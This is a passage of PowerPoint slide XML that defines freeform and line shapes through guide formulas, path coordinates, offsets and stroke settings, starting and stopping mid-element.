                  <a:gd name="T58" fmla="*/ 322 w 404"/>
                  <a:gd name="T59" fmla="*/ 82 h 91"/>
                  <a:gd name="T60" fmla="*/ 337 w 404"/>
                  <a:gd name="T61" fmla="*/ 80 h 91"/>
                  <a:gd name="T62" fmla="*/ 351 w 404"/>
                  <a:gd name="T63" fmla="*/ 76 h 91"/>
                  <a:gd name="T64" fmla="*/ 363 w 404"/>
                  <a:gd name="T65" fmla="*/ 73 h 91"/>
                  <a:gd name="T66" fmla="*/ 375 w 404"/>
                  <a:gd name="T67" fmla="*/ 69 h 91"/>
                  <a:gd name="T68" fmla="*/ 384 w 404"/>
                  <a:gd name="T69" fmla="*/ 66 h 91"/>
                  <a:gd name="T70" fmla="*/ 391 w 404"/>
                  <a:gd name="T71" fmla="*/ 61 h 91"/>
                  <a:gd name="T72" fmla="*/ 397 w 404"/>
                  <a:gd name="T73" fmla="*/ 57 h 91"/>
                  <a:gd name="T74" fmla="*/ 402 w 404"/>
                  <a:gd name="T75" fmla="*/ 53 h 91"/>
                  <a:gd name="T76" fmla="*/ 404 w 404"/>
                  <a:gd name="T77" fmla="*/ 48 h 91"/>
                  <a:gd name="T78" fmla="*/ 404 w 404"/>
                  <a:gd name="T79" fmla="*/ 43 h 91"/>
                  <a:gd name="T80" fmla="*/ 402 w 404"/>
                  <a:gd name="T81" fmla="*/ 39 h 91"/>
                  <a:gd name="T82" fmla="*/ 397 w 404"/>
                  <a:gd name="T83" fmla="*/ 34 h 91"/>
                  <a:gd name="T84" fmla="*/ 391 w 404"/>
                  <a:gd name="T85" fmla="*/ 29 h 91"/>
                  <a:gd name="T86" fmla="*/ 384 w 404"/>
                  <a:gd name="T87" fmla="*/ 26 h 91"/>
                  <a:gd name="T88" fmla="*/ 375 w 404"/>
                  <a:gd name="T89" fmla="*/ 22 h 91"/>
                  <a:gd name="T90" fmla="*/ 363 w 404"/>
                  <a:gd name="T91" fmla="*/ 19 h 91"/>
                  <a:gd name="T92" fmla="*/ 351 w 404"/>
                  <a:gd name="T93" fmla="*/ 15 h 91"/>
                  <a:gd name="T94" fmla="*/ 337 w 404"/>
                  <a:gd name="T95" fmla="*/ 12 h 91"/>
                  <a:gd name="T96" fmla="*/ 322 w 404"/>
                  <a:gd name="T97" fmla="*/ 10 h 91"/>
                  <a:gd name="T98" fmla="*/ 298 w 404"/>
                  <a:gd name="T99" fmla="*/ 6 h 91"/>
                  <a:gd name="T100" fmla="*/ 262 w 404"/>
                  <a:gd name="T101" fmla="*/ 3 h 91"/>
                  <a:gd name="T102" fmla="*/ 223 w 404"/>
                  <a:gd name="T103" fmla="*/ 0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4"/>
                  <a:gd name="T157" fmla="*/ 0 h 91"/>
                  <a:gd name="T158" fmla="*/ 404 w 404"/>
                  <a:gd name="T159" fmla="*/ 91 h 9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4" h="91">
                    <a:moveTo>
                      <a:pt x="202" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="181" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="202" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="223" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="243" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="280" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="298" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="322" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="330" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="337" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="344" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="351" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="363" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="369" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="375" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="379" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="384" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="388" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="391" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="395" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="397" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="402" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="403" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="403" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="402" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="397" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="395" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="391" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="388" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="384" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="379" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="375" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="369" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="363" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="351" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="344" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="337" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="330" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="322" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="298" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="280" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="243" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="223" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="202" y="0"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="14288">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10674" name="Line 81"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2656" y="2747"/>
                <a:ext cx="63" cy="1"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="34925">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10675" name="Line 82"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2585" y="2695"/>
                <a:ext cx="74" cy="52"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="34925">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10676" name="Line 83"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2519" y="2745"/>
                <a:ext cx="71" cy="2"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="34925">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10677" name="Line 84"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="2585" y="2694"/>
                <a:ext cx="74" cy="51"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="34925">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10678" name="Line 85"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1597" y="2340"/>
                <a:ext cx="1" cy="547"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="11113">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10679" name="Line 86"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1452" y="2340"/>
                <a:ext cx="145" cy="1"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="11113">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10680" name="Line 87"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1452" y="2661"/>
                <a:ext cx="145" cy="1"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="11113">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10681" name="Line 88"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1452" y="2884"/>
                <a:ext cx="145" cy="1"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="11113">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10682" name="Line 89"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1597" y="2627"/>
                <a:ext cx="116" cy="1"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="11113">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10683" name="Line 90"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2042" y="2639"/>
                <a:ext cx="115" cy="1"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="11113">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10684" name="Line 91"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2159" y="2397"/>
                <a:ext cx="1" cy="490"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="11113">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10685" name="Line 92"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2013" y="2397"/>
                <a:ext cx="144" cy="1"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="11113">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10686" name="Line 93"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2013" y="2887"/>
                <a:ext cx="144" cy="1"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="11113">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10687" name="Freeform 94"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1200" y="2548"/>
                <a:ext cx="249" cy="208"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 70 w 249"/>
                  <a:gd name="T1" fmla="*/ 14 h 208"/>
                  <a:gd name="T2" fmla="*/ 70 w 249"/>
                  <a:gd name="T3" fmla="*/ 14 h 208"/>
                  <a:gd name="T4" fmla="*/ 73 w 249"/>
                  <a:gd name="T5" fmla="*/ 14 h 208"/>
                  <a:gd name="T6" fmla="*/ 75 w 249"/>
                  <a:gd name="T7" fmla="*/ 12 h 208"/>
                  <a:gd name="T8" fmla="*/ 79 w 249"/>
                  <a:gd name="T9" fmla="*/ 11 h 208"/>
                  <a:gd name="T10" fmla="*/ 83 w 249"/>
                  <a:gd name="T11" fmla="*/ 10 h 208"/>
                  <a:gd name="T12" fmla="*/ 88 w 249"/>
                  <a:gd name="T13" fmla="*/ 9 h 208"/>
                  <a:gd name="T14" fmla="*/ 95 w 249"/>
                  <a:gd name="T15" fmla="*/ 8 h 208"/>
                  <a:gd name="T16" fmla="*/ 103 w 249"/>
                  <a:gd name="T17" fmla="*/ 5 h 208"/>
                  <a:gd name="T18" fmla="*/ 111 w 249"/>
                  <a:gd name="T19" fmla="*/ 4 h 208"/>
                  <a:gd name="T20" fmla="*/ 121 w 249"/>
                  <a:gd name="T21" fmla="*/ 3 h 208"/>
                  <a:gd name="T22" fmla="*/ 132 w 249"/>
                  <a:gd name="T23" fmla="*/ 2 h 208"/>
                  <a:gd name="T24" fmla="*/ 144 w 249"/>
                  <a:gd name="T25" fmla="*/ 1 h 208"/>
                  <a:gd name="T26" fmla="*/ 157 w 249"/>
                  <a:gd name="T27" fmla="*/ 0 h 208"/>
                  <a:gd name="T28" fmla="*/ 170 w 249"/>
                  <a:gd name="T29" fmla="*/ 0 h 208"/>
                  <a:gd name="T30" fmla="*/ 185 w 249"/>
                  <a:gd name="T31" fmla="*/ 0 h 208"/>
                  <a:gd name="T32" fmla="*/ 201 w 249"/>
                  <a:gd name="T33" fmla="*/ 0 h 208"/>
                  <a:gd name="T34" fmla="*/ 208 w 249"/>
                  <a:gd name="T35" fmla="*/ 28 h 208"/>
                  <a:gd name="T36" fmla="*/ 210 w 249"/>
                  <a:gd name="T37" fmla="*/ 29 h 208"/>
                  <a:gd name="T38" fmla="*/ 216 w 249"/>
                  <a:gd name="T39" fmla="*/ 32 h 208"/>
                  <a:gd name="T40" fmla="*/ 222 w 249"/>
                  <a:gd name="T41" fmla="*/ 39 h 208"/>
                  <a:gd name="T42" fmla="*/ 226 w 249"/>
                  <a:gd name="T43" fmla="*/ 50 h 208"/>
                  <a:gd name="T44" fmla="*/ 240 w 249"/>
                  <a:gd name="T45" fmla="*/ 115 h 208"/>
                  <a:gd name="T46" fmla="*/ 247 w 249"/>
                  <a:gd name="T47" fmla="*/ 143 h 208"/>
                  <a:gd name="T48" fmla="*/ 247 w 249"/>
                  <a:gd name="T49" fmla="*/ 146 h 208"/>
                  <a:gd name="T50" fmla="*/ 248 w 249"/>
                  <a:gd name="T51" fmla="*/ 150 h 208"/>
                  <a:gd name="T52" fmla="*/ 248 w 249"/>
                  <a:gd name="T53" fmla="*/ 159 h 208"/>
                  <a:gd name="T54" fmla="*/ 244 w 249"/>
                  <a:gd name="T55" fmla="*/ 169 h 208"/>
                  <a:gd name="T56" fmla="*/ 0 w 249"/>
                  <a:gd name="T57" fmla="*/ 162 h 208"/>
                  <a:gd name="T58" fmla="*/ 25 w 249"/>
                  <a:gd name="T59" fmla="*/ 149 h 208"/>
                  <a:gd name="T60" fmla="*/ 25 w 249"/>
                  <a:gd name="T61" fmla="*/ 28 h 208"/>
                  <a:gd name="T62" fmla="*/ 26 w 249"/>
                  <a:gd name="T63" fmla="*/ 27 h 208"/>
                  <a:gd name="T64" fmla="*/ 28 w 249"/>
                  <a:gd name="T65" fmla="*/ 25 h 208"/>
                  <a:gd name="T66" fmla="*/ 32 w 249"/>
                  <a:gd name="T67" fmla="*/ 24 h 208"/>
                  <a:gd name="T68" fmla="*/ 37 w 249"/>
                  <a:gd name="T69" fmla="*/ 22 h 208"/>
                  <a:gd name="T70" fmla="*/ 42 w 249"/>
                  <a:gd name="T71" fmla="*/ 22 h 208"/>
                  <a:gd name="T72" fmla="*/ 49 w 249"/>
                  <a:gd name="T73" fmla="*/ 22 h 208"/>
                  <a:gd name="T74" fmla="*/ 58 w 249"/>
                  <a:gd name="T75" fmla="*/ 23 h 208"/>
                  <a:gd name="T76" fmla="*/ 68 w 249"/>
                  <a:gd name="T77" fmla="*/ 27 h 20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49"/>
                  <a:gd name="T118" fmla="*/ 0 h 208"/>
                  <a:gd name="T119" fmla="*/ 249 w 249"/>
                  <a:gd name="T120" fmla="*/ 208 h 20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49" h="208">
                    <a:moveTo>
                      <a:pt x="68" y="27"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="70" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
